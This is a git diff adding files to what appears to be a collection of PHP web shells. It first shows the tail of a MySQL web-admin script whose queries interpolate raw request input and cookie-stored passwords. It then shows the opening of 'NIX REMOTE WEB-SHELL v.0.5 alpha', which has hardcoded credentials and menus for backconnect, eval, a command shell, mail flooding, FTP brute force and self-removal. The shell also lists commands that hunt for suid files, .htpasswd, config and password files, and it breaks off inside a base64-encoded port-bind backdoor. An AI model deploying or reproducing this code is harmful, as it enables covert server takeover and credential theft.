+<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) echo "checked";?>>BLOB (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMBLOB" <? if( $type == "mediumblob" ) echo "checked";?>>MEDIUMBLOB (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGBLOB" <? if( $type == "longblob" ) echo "checked";?>>LONGBLOB (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="ENUM" <? if( $type == "enum" ) echo "checked";?>>ENUM</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SET" <? if( $type == "set" ) echo "checked";?>>SET</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+
+</table>
+<table>
+<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: 'apple', 'orange', 'banana') </th></tr>
+<tr>
+<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo "value=$M";?>></td>
+<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo "value=$D";?>></td>
+<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? if( strpos( $fieldtype, "unsigned" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=zerofill value="ZEROFILL" <? if( strpos( $fieldtype, "zerofill" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=binary value="BINARY" <? if( strpos( $fieldtype, "binary" )  ) echo "checked";?>></td>
+<td align=center><input type=text size=60 name=valuelist <? if( $valuelist != "" ) echo "value=\"$valuelist\"";?>></td>
+</tr>
+</table>
+
+
+<h3>Flags</h3>
+<table>
+<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
+<tr>
+<td align=center><input type=checkbox name=not_null value="NOT NULL" <? if( $fieldnull != "YES" ) echo "checked";?>></td>
+<td align=center><input type=text name=default_value <? if( $fielddefault != "" ) echo "value=$fielddefault";?>></td>
+<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" <? if( $fieldextra == "auto_increment" ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" <? if( $fieldkey == "PRI" ) echo "checked";?>></td>
+</tr>
+</table>
+
+<p>
+
+<?
+if( $cmd == "add" )
+  echo "<input type=submit value='Add Field'>\n";
+else if( $cmd == "edit" )
+  echo "<input type=submit value='Edit Field'>\n";
+echo "<input type=button value=Cancel onClick='history.back()'>\n";
+echo "</form>\n";
+}
+
+function manageField_submit( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
+  $M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;
+
+if( $cmd == "add" )
+  $queryStr = "ALTER TABLE $tablename ADD $name ";
+else if( $cmd == "edit" )
+  $queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
+
+if( $M != "" )
+  if( $D != "" )
+  $queryStr .= "$type($M,$D) ";
+  else
+  $queryStr .= "$type($M) ";
+else if( $valuelist != "" ) {
+  $valuelist = stripslashes( $valuelist );
+  $queryStr .= "$type($valuelist) ";
+} else
+  $queryStr .= "$type ";
+
+$queryStr .= "$unsigned $zerofill $binary ";
+
+if( $default_value != "" )
+  $queryStr .= "DEFAULT '$default_value' ";
+
+$queryStr .= "$not_null $auto_increment";
+
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+// key change
+$keyChange = false;
+$result = mysql_query( "SHOW KEYS FROM $tablename" );
+$primary = "";
+while( $row = mysql_fetch_array($result) )
+  if( $row["Key_name"] == "PRIMARY" ) {
+  if( $row[Column_name] == $name )
+    $keyChange = true;
+  else
+    $primary .= ", $row[Column_name]";
+  }
+if( $primary_key == "PRIMARY KEY" ) {
+  $primary .= ", $name";
+  $keyChange = !$keyChange;
+}
+$primary = substr( $primary, 2 );
+if( $keyChange == true ) {
+  $q = "ALTER TABLE $tablename DROP PRIMARY KEY";
+  mysql_query( $q );
+  $queryStr .= "<br>\n" . $q;
+  $errMsg .= "<br>\n" . mysql_error();
+  $q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
+  mysql_query( $q );
+  $queryStr .= "<br>\n" . $q;
+  $errMsg .= "<br>\n" . mysql_error();
+}
+
+viewSchema();
+}
+
+function dropField() {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
+mysql_select_db( $dbname, $mysqlHandle );
+mysql_query( $queryStr , $mysqlHandle );
+$errMsg = mysql_error();
+
+viewSchema();
+}
+
+function viewData( $queryStr ) {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;
+
+echo "<h1>Data in Table</h1>\n";
+if( $tablename != "" )
+  echo "<p class=location>$dbname &gt; $tablename</p>\n";
+else
+  echo "<p class=location>$dbname</p>\n";
+
+$queryStr = stripslashes( $queryStr );
+if( $queryStr == "" ) {
+  $queryStr = "SELECT * FROM $tablename";
+  if( $orderby != "" )
+  $queryStr .= " ORDER BY $orderby";
+  echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
+  echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+}
+
+$pResult = mysql_db_query( $dbname, $queryStr );
+$errMsg = mysql_error();
+
+$GLOBALS[queryStr] = $queryStr;
+
+if( $pResult == false ) {
+  echoQueryResult();
+  return;
+}
+if( $pResult == 1 ) {
+  $errMsg = "Success";
+  echoQueryResult();
+  return;
+}
+
+echo "<hr>\n";
+
+$row = mysql_num_rows( $pResult );
+$col = mysql_num_fields( $pResult );
+
+if( $row == 0 ) {
+  echo "No Data Exist!";
+  return;
+}
+
+if( $rowperpage == "" ) $rowperpage = 20;
+if( $page == "" ) $page = 0;
+else $page--;
+mysql_data_seek( $pResult, $page * $rowperpage );
+
+echo "<table cellspacing=1 cellpadding=2>\n";
+echo "<tr>\n";
+for( $i = 0; $i < $col; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  echo "<th>";
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
+  echo "</th>\n";
+}
+echo "<th colspan=2>Action</th>\n";
+echo "</tr>\n";
+
+for( $i = 0; $i < $rowperpage; $i++ ) {
+  $rowArray = mysql_fetch_row( $pResult );
+  if( $rowArray == false ) break;
+  echo "<tr>\n";
+  $key = "";
+  for( $j = 0; $j < $col; $j++ ) {
+  $data = $rowArray[$j];
+
+  $field = mysql_fetch_field( $pResult, $j );
+  if( $field->primary_key == 1 )
+    $key .= "&" . $field->name . "=" . $data;
+
+  if( strlen( $data ) > 20 )
+    $data = substr( $data, 0, 20 ) . "...";
+  $data = htmlspecialchars( $data );
+  echo "<td>\n";
+  echo "$data\n";
+  echo "</td>\n";
+  }
+
+  if( $key == "" )
+  echo "<td colspan=2>no Key</td>\n";
+  else {
+  echo "<td><a href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n";
+  echo "<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
+  }
+  echo "</tr>\n";
+}
+echo "</table>\n";
+
+echo "<font size=2>\n";
+echo "<form action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' method=post>\n";
+echo "<font color=green>\n";
+echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
+echo "</font>\n";
+echo " | ";
+if( $page > 0 ) {
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
+  if( $orderby != "" )
+  echo "&orderby=$orderby";
+  echo "'>Prev</a>\n";
+} else
+  echo "Prev";
+echo " | ";
+if( $page < ($row/$rowperpage)-1 ) {
+  echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
+  if( $orderby != "" )
+  echo "&orderby=$orderby";
+  echo "'>Next</a>\n";
+} else
+  echo "Next";
+echo " | ";
+if( $row > $rowperpage ) {
+  echo "<input type=text size=4 name=page>\n";
+  echo "<input type=submit value='Go'>\n";
+}
+echo "</form>\n";
+echo "</font>\n";
+}
+
+function manageData( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
+
+if( $cmd == "add" )
+  echo "<h1>Add Data</h1>\n";
+else if( $cmd == "edit" ) {
+  echo "<h1>Edit Data</h1>\n";
+  $pResult = mysql_list_fields( $dbname, $tablename );
+  $num = mysql_num_fields( $pResult );
+
+  $key = "";
+  for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  if( $field->primary_key == 1 )
+    if( $field->numeric == 1 )
+    $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+    else
+    $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+  }
+  $key = substr( $key, 0, strlen($key)-4 );
+
+  mysql_select_db( $dbname, $mysqlHandle );
+  $pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
+  $data = mysql_fetch_array( $pResult );
+}
+
+echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+echo "<form action='$PHP_SELF' method=post>\n";
+if( $cmd == "add" )
+  echo "<input type=hidden name=action value=addData_submit>\n";
+else if( $cmd == "edit" )
+  echo "<input type=hidden name=action value=editData_submit>\n";
+echo "<input type=hidden name=dbname value=$dbname>\n";
+echo "<input type=hidden name=tablename value=$tablename>\n";
+echo "<table cellspacing=1 cellpadding=2>\n";
+echo "<tr>\n";
+echo "<th>Name</th>\n";
+echo "<th>Type</th>\n";
+echo "<th>Function</th>\n";
+echo "<th>Data</th>\n";
+echo "</tr>\n";
+
+$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+$num = mysql_num_rows( $pResult );
+
+$pResultLen = mysql_list_fields( $dbname, $tablename );
+
+for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_array( $pResult );
+  $fieldname = $field["Field"];
+  $fieldtype = $field["Type"];
+  $len = mysql_field_len( $pResultLen, $i );
+
+  echo "<tr>";
+  echo "<td>$fieldname</td>";
+  echo "<td>".$field["Type"]."</td>";
+  echo "<td>\n";
+  echo "<select name=${fieldname}_function>\n";
+  echo "<option>\n";
+  echo "<option>ASCII\n";
+  echo "<option>CHAR\n";
+  echo "<option>SOUNDEX\n";
+  echo "<option>CURDATE\n";
+  echo "<option>CURTIME\n";
+  echo "<option>FROM_DAYS\n";
+  echo "<option>FROM_UNIXTIME\n";
+  echo "<option>NOW\n";
+  echo "<option>PASSWORD\n";
+  echo "<option>PERIOD_ADD\n";
+  echo "<option>PERIOD_DIFF\n";
+  echo "<option>TO_DAYS\n";
+  echo "<option>USER\n";
+  echo "<option>WEEKDAY\n";
+  echo "<option>RAND\n";
+  echo "</select>\n";
+  echo "</td>\n";
+  $value = htmlspecialchars($data[$i]);
+  if( $cmd == "add" ) {
+  $type = strtok( $fieldtype, " (,)\n" );
+  if( $type == "enum" || $type == "set" ) {
+    echo "<td>\n";
+    if( $type == "enum" )
+    echo "<select name=$fieldname>\n";
+    else if( $type == "set" )
+    echo "<select name=$fieldname size=4 multiple>\n";
+    echo strtok( "'" );
+    while( $str = strtok( "'" ) ) {
+    echo "<option>$str\n";
+    strtok( "'" );
+    }
+    echo "</select>\n";
+    echo "</td>\n";
+  } else {
+    if( $len < 40 )
+    echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
+    else
+    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
+  }
+  } else if( $cmd == "edit" ) {
+  $type = strtok( $fieldtype, " (,)\n" );
+  if( $type == "enum" || $type == "set" ) {
+    echo "<td>\n";
+    if( $type == "enum" )
+    echo "<select name=$fieldname>\n";
+    else if( $type == "set" )
+    echo "<select name=$fieldname size=4 multiple>\n";
+    echo strtok( "'" );
+    while( $str = strtok( "'" ) ) {
+    if( $value == $str )
+      echo "<option selected>$str\n";
+    else
+      echo "<option>$str\n";
+    strtok( "'" );
+    }
+    echo "</select>\n";
+    echo "</td>\n";
+  } else {
+    if( $len < 40 )
+    echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
+    else
+    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
+  }
+  }
+  echo "</tr>";
+}
+echo "</table><p>\n";
+if( $cmd == "add" )
+  echo "<input type=submit value='Add Data'>\n";
+else if( $cmd == "edit" )
+  echo "<input type=submit value='Edit Data'>\n";
+echo "<input type=button value='Cancel' onClick='history.back()'>\n";
+echo "</form>\n";
+}
+
+function manageData_submit( $cmd ) {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+$pResult = mysql_list_fields( $dbname, $tablename );
+$num = mysql_num_fields( $pResult );
+
+mysql_select_db( $dbname, $mysqlHandle );
+if( $cmd == "add" )
+  $queryStr = "INSERT INTO $tablename VALUES (";
+else if( $cmd == "edit" )
+  $queryStr = "REPLACE INTO $tablename VALUES (";
+for( $i = 0; $i < $num-1; $i++ ) {
+  $field = mysql_fetch_field( $pResult );
+  $func = $GLOBALS[$field->name."_function"];
+  if( $func != "" )
+  $queryStr .= " $func(";
+  if( $field->numeric == 1 ) {
+  $queryStr .= $GLOBALS[$field->name];
+  if( $func != "" )
+    $queryStr .= "),";
+  else
+    $queryStr .= ",";
+  } else {
+  $queryStr .= "'" . $GLOBALS[$field->name];
+  if( $func != "" )
+    $queryStr .= "'),";
+  else
+    $queryStr .= "',";
+  }
+}
+$field = mysql_fetch_field( $pResult );
+if( $field->numeric == 1 )
+  $queryStr .= $GLOBALS[$field->name] . ")";
+else
+  $queryStr .= "'" . $GLOBALS[$field->name] . "')";
+
+mysql_query( $queryStr , $mysqlHandle );
+$errMsg = mysql_error();
+
+viewData( "" );
+}
+
+function deleteData() {
+global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+$pResult = mysql_list_fields( $dbname, $tablename );
+$num = mysql_num_fields( $pResult );
+
+$key = "";
+for( $i = 0; $i < $num; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  if( $field->primary_key == 1 )
+  if( $field->numeric == 1 )
+    $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+  else
+    $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+}
+$key = substr( $key, 0, strlen($key)-4 );
+
+mysql_select_db( $dbname, $mysqlHandle );
+$queryStr =  "DELETE FROM $tablename WHERE $key";
+mysql_query( $queryStr, $mysqlHandle );
+$errMsg = mysql_error();
+
+viewData( "" );
+}
+
+function dump() {
+global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename;
+
+if( $action == "dumpTable" )
+  $filename = $tablename;
+else
+  $filename = $dbname;
+
+header("Content-disposition: filename=$filename.sql");
+header("Content-type: application/octetstream");
+header("Pragma: no-cache");
+header("Expires: 0");
+
+$pResult = mysql_query( "show variables" );
+while( 1 ) {
+  $rowArray = mysql_fetch_row( $pResult );
+  if( $rowArray == false ) break;
+  if( $rowArray[0] == "basedir" )
+  $bindir = $rowArray[1]."bin/";
+}
+
+passthru( $bindir."mysqldump --user=$USERNAME --password=$PASSWORD $dbname $tablename" );
+}
+
+function utils() {
+global $PHP_SELF, $command;
+echo "<h1>Utilities</h1>\n";
+if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
+  echo "<hr>\n";
+  echo "Show\n";
+  echo "<ul>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
+  echo "</ul>\n";
+  echo "Flush\n";
+  echo "<ul>\n";
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
+  if( $command == "flush_hosts" ) {
+  if( mysql_query( "Flush hosts" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
+  if( $command == "flush_logs" ) {
+  if( mysql_query( "Flush logs" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
+  if( $command == "flush_privileges" ) {
+  if( mysql_query( "Flush privileges" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
+  if( $command == "flush_tables" ) {
+  if( mysql_query( "Flush tables" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
+  if( $command == "flush_status" ) {
+  if( mysql_query( "Flush status" ) != false )
+    echo "<font size=2 color=red>- Success</font>";
+  else
+    echo "<font size=2 color=red>- Fail</font>";
+  }
+  echo "</ul>\n";
+} else {
+  $queryStr = ereg_replace( "_", " ", $command );
+  $pResult = mysql_query( $queryStr );
+  if( $pResult == false ) {
+  echo "Fail";
+  return;
+  }
+  $col = mysql_num_fields( $pResult );
+
+  echo "<p class=location>$queryStr</p>\n";
+  echo "<hr>\n";
+
+  echo "<table cellspacing=1 cellpadding=2 border=0>\n";
+  echo "<tr>\n";
+  for( $i = 0; $i < $col; $i++ ) {
+  $field = mysql_fetch_field( $pResult, $i );
+  echo "<th>".$field->name."</th>\n";
+  }
+  echo "</tr>\n";
+
+  while( 1 ) {
+  $rowArray = mysql_fetch_row( $pResult );
+  if( $rowArray == false ) break;
+  echo "<tr>\n";
+  for( $j = 0; $j < $col; $j++ )
+    echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
+  echo "</tr>\n";
+  }
+  echo "</table>\n";
+}
+}
+
+function header_html() {
+global $PHP_SELF;
+
+?>
+<html>
+<head>
+<title>MySQL Web Interface</title>
+<style type="text/css">
+<!--
+p.location {
+color: #FF6000;
+font-size: small;
+}
+h1 {
+color: #0090FF;
+}
+th {
+background-color: #34A725;
+color: #FFFFFF;
+font-size: x-small;
+}
+td {
+background-color: #5DB1FF;
+font-size: x-small;
+}
+form {
+margin-top: 0;
+margin-bottom: 0;
+}
+a {
+text-decoration:none;
+color: #848200;
+font-size:x-small;
+}
+a:link {
+}
+a:hover {
+background-color:#EEEFD5;
+color:#FF0000;
+text-decoration:none             
+}
+//-->
+</style>
+</head>
+<body>
+<?
+}
+
+function footer_html() {
+global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
+
+echo "<hr>\n";
+echo "<font size=2>\n";
+echo "<font color=blue>[$USERNAME]</font> - \n";
+
+echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
+if( $tablename != "" )
+  echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
+echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
+echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
+echo "</font>\n";
+echo "</body>\n";
+echo "</html>\n";
+}
+
+//------------------------------------------------------ MAIN
+
+if( $action == "logon" || $action == "" || $action == "logout" )
+logon();
+else if( $action == "logon_submit" )
+logon_submit();
+else if( $action == "dumpTable" || $action == "dumpDB" ) {
+while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+  if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+  if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+}
+$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+dump();
+} else {
+while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+  if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+  if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+}
+echo "<!--";
+$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+echo "-->";
+
+if( $mysqlHandle == false ) {
+  echo "<html>\n";
+  echo "<head>\n";
+  echo "<title>MySQL Web Interface</title>\n";
+  echo "</head>\n";
+  echo "<body>\n";
+  echo "<table width=100% height=100%><tr><td><center>\n";
+  echo "<h1>Wrong Password!</h1>\n";
+  echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
+  echo "</center></td></tr></table>\n";
+  echo "</body>\n";
+  echo "</html>\n";
+} else {
+  header_html();
+  if( $action == "listDBs" )
+  listDatabases();
+  else if( $action == "createDB" )
+  createDatabase();
+  else if( $action == "dropDB" )
+  dropDatabase();
+  else if( $action == "listTables" )
+  listTables();
+  else if( $action == "createTable" )
+  createTable();
+  else if( $action == "dropTable" )
+  dropTable();
+  else if( $action == "viewSchema" )
+  viewSchema();
+  else if( $action == "query" )
+  viewData( $queryStr );
+  else if( $action == "addField" )
+  manageField( "add" );
+  else if( $action == "addField_submit" )
+  manageField_submit( "add" );
+  else if( $action == "editField" )
+  manageField( "edit" );
+  else if( $action == "editField_submit" )
+  manageField_submit( "edit" );
+  else if( $action == "dropField" )
+  dropField();
+  else if( $action == "viewData" )
+  viewData( "" );
+  else if( $action == "addData" )
+  manageData( "add" );
+  else if( $action == "addData_submit" )
+  manageData_submit( "add" );
+  else if( $action == "editData" )
+  manageData( "edit" );
+  else if( $action == "editData_submit" )
+  manageData_submit( "edit" );
+  else if( $action == "deleteData" )
+  deleteData();
+  else if( $action == "utils" )
+  utils();
+
+  mysql_close( $mysqlHandle);
+  footer_html();
+}
+}
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt b/xakep-shells/PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt
new file mode 100644
index 0000000..ec24917
--- /dev/null
+++ b/xakep-shells/PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt	
@@ -0,0 +1,1480 @@
+<?php
+$name="GaMMa";
+$pass="Hack";
+$demail ="xakep@xaep.ru";
+if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$name || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)
+   {
+   header("WWW-Authenticate: Basic realm=\"AdminAccess\"");
+   header("HTTP/1.0 401 Unauthorized");
+   exit("Access Denied");
+   }
+
+$title="NIX REMOTE WEB-SHELL";
+$ver=" v.0.5a Lite";
+
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+<head>
+<title>NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version </title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+<meta http-equiv="pragma" content="no-cache">
+<meta http-equiv="Content-Language" content="en,ru"> 
+<META name="autor" content="DreAmeRz (www.dreamerz.cc)">
+<style type="text/css">
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+scrollbar-face-color: #FFFFFF;
+scrollbar-shadow-color:#000000 ;
+scrollbar-highlight-color:#FFFFFF;
+scrollbar-3dlight-color: #000000;
+scrollbar-darkshadow-color:#FFFFFF ;
+scrollbar-track-color: #FFFFFF;
+scrollbar-arrow-color: #000000;
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: black;
+TEXT-DECORATION: none
+}
+A:link {COLOR:black; TEXT-DECORATION: none}
+A:visited { COLOR:black; TEXT-DECORATION: none}
+A:active {COLOR:black; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+</HEAD>
+
+
+<BODY bgcolor="#fffcf9" text="#000000">
+<P align=center>[ <A href="javascript:history.next(+1)">������ ] </A><B><FONT color=#cccccc size=4>*.NIX REMOTE WEB-SHELL</FONT></B>
+v.0.5a<FONT color=#linux size=1> Lite </FONT> [ <A href="javascript:history.back(-1)">����� ]</A>[ <A href="?ac=about" title='��� ����� ������ ...'>� ������� ]</a><BR>
+<A href="?ac=info" title='����� ��� �� ���� ������� !'>[ ���������� � �������</A> ][ <A href="?ac=navigation" title='������� ����������� ���������. ��������, �������������� ...'>���������</A> ][ <A href="?ac=backconnect" title='��������� backconnect � �������� ������� '>���������
+�������</A> ][ <A href="?ac=eval" title='������ ���� ������ �� ��� ����� ����� :)'>��� ���</A> ][ <A href="?ac=upload" title='�������� ������ �����, ������� ��������, �������� ������ � ���������� ���������� !'>�������� ������</A> ][ <A href="?ac=shell" title='bash shell,������ ...'>����������
+������� ]</A> <br><A href="?ac=sendmail" title='������ �-mail ����� �� ����'> [ �������� ������</A> ][ <A href="?ac=mailfluder" title='���� ���-�� ������ ? ����� ���� ���� ...'>����������</A>
+ ][ <A href="?ac=ftp" title='������� �������� ftp ����������'>��� Brut</A> ][ <A href="?ac=tools" title='�����������/������������� md5,des,sha1,base64 ... '>����������� ]</A>[ <A href="?ac=ps" title='���������� ������ �������� �� ������� � ��������� �� �������! '>������</A> ][ <A href="?ac=selfremover" title='������ ���� ������ ? ����� ����� ������� � ���� ...'>������� ����</A> ]</P>
+<?php
+if (ini_get('register_globals') != '1') {
+
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+Error_Reporting(E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR);
+set_magic_quotes_runtime(0);
+set_time_limit(0); // ������ ����������� �� �������
+ignore_user_abort(1); // ������������ ������ ����� � ���������
+error_reporting(0);
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
+$aliases=array(
+'------------------------------------------------------------------------------------' => 'ls -la;pwd;uname -a',
+'����� �� ������� ���� ������ � suid �����' => 'find / -type f -perm -04000 -ls',
+'����� �� ������� ���� ������ � sgid �����' => 'find / -type f -perm -02000 -ls',
+'����� � ������� ���������� ���� ������ � sgid �����' => 'find . -type f -perm -02000 -ls',
+'����� �� ������� ������ config' => 'find / -type f -name "config*"',
+'����� �� ������� ������ admin' => 'find / -type f -name "admin*"',
+'����� � ������� ���������� ������ config' => 'find . -type f -name "config*"',
+'����� � ������� ���������� ������ pass' => 'find . -type f -name "pass*"',
+'����� �� ������� ���� ���������� � ������ ��������� �� ������ ��� ����' => 'find / -perm -2 -ls',
+'����� � ������� ���������� ���� ���������� � ������ ��������� �� ������ ��� ����' => 'find . -perm -2 -ls',
+'����� � ������� ���������� ������ service.pwd' => 'find . -type f -name service.pwd',
+'����� �� ������� ������ service.pwd' => 'find / -type f -name service.pwd',
+'����� �� ������� ������ .htpasswd' => 'find / -type f -name .htpasswd',
+'����� � ������� ���������� ������ .htpasswd' => 'find . -type f -name .htpasswd',
+'����� ���� ������ .bash_history' => 'find / -type f -name .bash_history',
+'����� � ������� ���������� ������ .bash_history' => 'find . -type f -name .bash_history',
+'����� ���� ������ .fetchmailrc' => 'find / -type f -name .fetchmailrc',
+'����� � ������� ���������� ������ .fetchmailrc' => 'find . -type f -name .fetchmailrc',
+'����� ������ ��������� ������ �� �������� ������� ext2fs' => 'lsattr -va',
+'�������� �������� ������' => 'netstat -an | grep -i listen',
+'����� ���� ��� ������ �� ������ password' =>'find / -name *.php | xargs grep -li password',
+'����� ����� � ����� 777' =>'find / -type d -perm 0777',
+'����������� ������ ��' =>'sysctl -a | grep version',
+'����������� ������ ����' =>'cat /proc/version',
+'�������� syslog.conf' =>'cat /etc/syslog.conf',
+'�������� - Message of the day' =>'cat /etc/motd',
+'�������� hosts' =>'cat /etc/hosts',
+'������ ������������ 1' =>'cat /etc/issue.net',
+'������ ������������ 2' =>'cat /etc/*-realise',
+'�������� ��� �������' =>'ps auxw',
+'�������� �������� ������������' =>'ps ux',
+'����� httpd.conf' =>'locate httpd.conf');
+
+
+
+/* Port bind source */
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5
+jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5
+ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5
